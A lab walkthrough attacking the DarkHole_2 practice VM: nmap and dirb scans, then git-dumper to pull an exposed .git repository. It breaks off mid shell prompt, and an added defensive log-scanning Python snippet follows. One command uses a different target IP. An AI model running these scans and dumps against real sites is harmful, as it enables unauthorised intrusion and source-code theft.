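Table of contents

  • Target environment
  • 1. Information gathering
  • 2. Exploitation
  • 3. Privilege escalation
  • Summary

Target environment

Attacker: kali
IP: 192.168.247.129
Target: DarkHole_2
IP: 192.168.247.131

1. Information gathering

Run: nmap -A -T4 -sV -p- 192.168.247.131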

Starting Nmap 7.92 ( https://nmap.org ) at 2022-01-14 06:45 EST
Nmap scan report for 192.168.247.131
Host is up (0.00058s latency).
Not shown: 65533 closed tcp ports (reset)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   3072 57:b1:f5:64:28:98:91:51:6d:70:76:6e:a5:52:43:5d (RSA)
|   256 cc:64:fd:7c:d8:5e:48:8a:28:98:91:b9:e4:1e:6d:a8 (ECDSA)
|_  256 9e:77:08:a4:52:9f:33:8d:96:19:ba:75:71:27:bd:60 (ED25519)
80/tcp open  http    Apache httpd 2.4.41 ((Ubuntu))
|_http-title: DarkHole V2
| http-git:
|   192.168.247.131:80/.git/
|     Git repository found!
|     Repository description: Unnamed repository; edit this file 'description' to name the...
|_    Last commit message: i changed login.php file for more secure
| http-cookie-flags:
|   /:
|     PHPSESSID:
|_      httponly flag not set
|_http-server-header: Apache/2.4.41 (Ubuntu)
MAC Address: 00:0C:29:54:32:C1 (VMware)
Device type: general purpose
Running: Linux 5.X
OS CPE: cpe:/o:linux:linux_kernel:5
OS details: Linux 5.0 - 5.3
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE
HOP RTT     ADDRESS
1   0.58 ms 192.168.247.131

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 11.29 seconds

Two ports are open: 80 and 22.

Run: dirb http://192.168.247.131

-----------------
DIRB v2.22
By The Dark Raver
-----------------

START_TIME: Fri Jan 14 06:51:10 2022
URL_BASE: http://192.168.247.131/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt

-----------------

GENERATED WORDS: 4612

---- Scanning URL: http://192.168.247.131/ ----
+ http://192.168.247.131/.git/HEAD (CODE:200|SIZE:23)
==> DIRECTORY: http://192.168.247.131/config/
+ http://192.168.247.131/index.php (CODE:200|SIZE:740)
==> DIRECTORY: http://192.168.247.131/js/
+ http://192.168.247.131/server-status (CODE:403|SIZE:280)
==> DIRECTORY: http://192.168.247.131/style/

---- Entering directory: http://192.168.247.131/config/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
    (Use mode '-w' if you want to scan it anyway)

---- Entering directory: http://192.168.247.131/js/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
    (Use mode '-w' if you want to scan it anyway)

---- Entering directory: http://192.168.247.131/style/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
    (Use mode '-w' if you want to scan it anyway)

-----------------
END_TIME: Fri Jan 14 06:51:14 2022
DOWNLOADED: 4612 - FOUND: 3

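2. Exploitation

A .git directory is exposed on the web server, which means the site's source code may be leaked.

Use the git-dumper tool, installed here with pip3.

Run: pip3 install -i https://pypi.tuna.tsinghua.edu.cn/simple --trusted-host pypi.tuna.tsinghua.edu.cn git-dumper

Download the contents of the .git directory.

Run: git-dumper http://192.168.184.143/.git/ backup

Change into the backup directory and view the log.

Run: git log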

commit 0f1d821f48a9cf662f285457a5ce9af6b9feb2c4 (HEAD -> master)
Author: Jehad Alqurashi <anmar-v7@hotmail.com>
Date:   Mon Aug 30 13:14:32 2021 +0300

    i changed login.php file for more secure

commit a4d900a8d85e8938d3601f3cef113ee293028e10
Author: Jehad Alqurashi <anmar-v7@hotmail.com>
Date:   Mon Aug 30 13:06:20 2021 +0300

    I added login.php file with default credentials

commit aa2a5f3aa15bb402f2b90a07d86af57436d64917
Author: Jehad Alqurashi <anmar-v7@hotmail.com>
Date:   Mon Aug 30 13:02:44 2021 +0300

    First Initialize

The log shows three commits.

Run: git diff followed by a commit hash, to view the differences between commits.

┌──(root												
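
From the defender's side, the .git retrieval described above leaves a clear trace in the web server's access log. The following is an added example, not part of the original write-up: it scans Apache combined-format log lines for requests under /.git/ and separates clients that were served repository content from those that were refused. The log lines, the object id and the function names are constructed for illustration.

```python
import re
from collections import defaultdict

# Apache "combined" format: host ident user [time] "METHOD path proto" status size ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>[A-Z]+) (?P<path>\S+)[^"]*" '
    r'(?P<status>\d{3}) \S+'
)
# A path segment named exactly ".git" (also with a URL-encoded dot); not ".gitignore".
GIT_RE = re.compile(r'/(?:\.|%2e)git(?:/|$)', re.IGNORECASE)
# Loose objects (objects/ab/<38 hex>) or pack files: actual repository content.
OBJECT_RE = re.compile(r'/objects/(?:[0-9a-f]{2}/[0-9a-f]{38}|pack/)', re.IGNORECASE)

# Constructed sample log lines (documentation IP ranges, made-up object id).
SAMPLE_LOG = [
    '192.0.2.10 - - [14/Jan/2022:06:51:10 -0500] "GET /.git/HEAD HTTP/1.1" 200 23 "-" "sample"',
    '192.0.2.10 - - [14/Jan/2022:06:52:01 -0500] "GET /.git/objects/ab/'
    '0123456789abcdef0123456789abcdef012345 HTTP/1.1" 200 180 "-" "sample"',
    '198.51.100.7 - - [14/Jan/2022:07:00:00 -0500] "GET /.git/config HTTP/1.1" 403 280 "-" "sample"',
    '198.51.100.7 - - [14/Jan/2022:07:00:05 -0500] "GET /index.php HTTP/1.1" 200 740 "-" "sample"',
]

def find_git_requests(lines):
    """Per client IP: .git requests served (2xx), how many of those were
    repository objects, and how many were not served (any other status)."""
    hits = defaultdict(lambda: {"served": 0, "objects": 0, "not_served": 0})
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # not a combined-format request line
        path = m["path"].split("?", 1)[0]
        if not GIT_RE.search(path):
            continue
        entry = hits[m["ip"]]
        if m["status"].startswith("2"):
            entry["served"] += 1
            entry["objects"] += bool(OBJECT_RE.search(path))
        else:
            entry["not_served"] += 1
    return dict(hits)

def classify(entry):
    """Severity for one client: content leaked > metadata leaked > blocked."""
    if entry["objects"]:
        return "repository objects served"
    if entry["served"]:
        return "git metadata served"
    return "blocked"

if __name__ == "__main__":
    for ip, entry in find_git_requests(SAMPLE_LOG).items():
        print(ip, classify(entry), entry)
```

Any 2xx response under /.git/ means the repository history, including credentials committed in earlier revisions, should be treated as disclosed.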
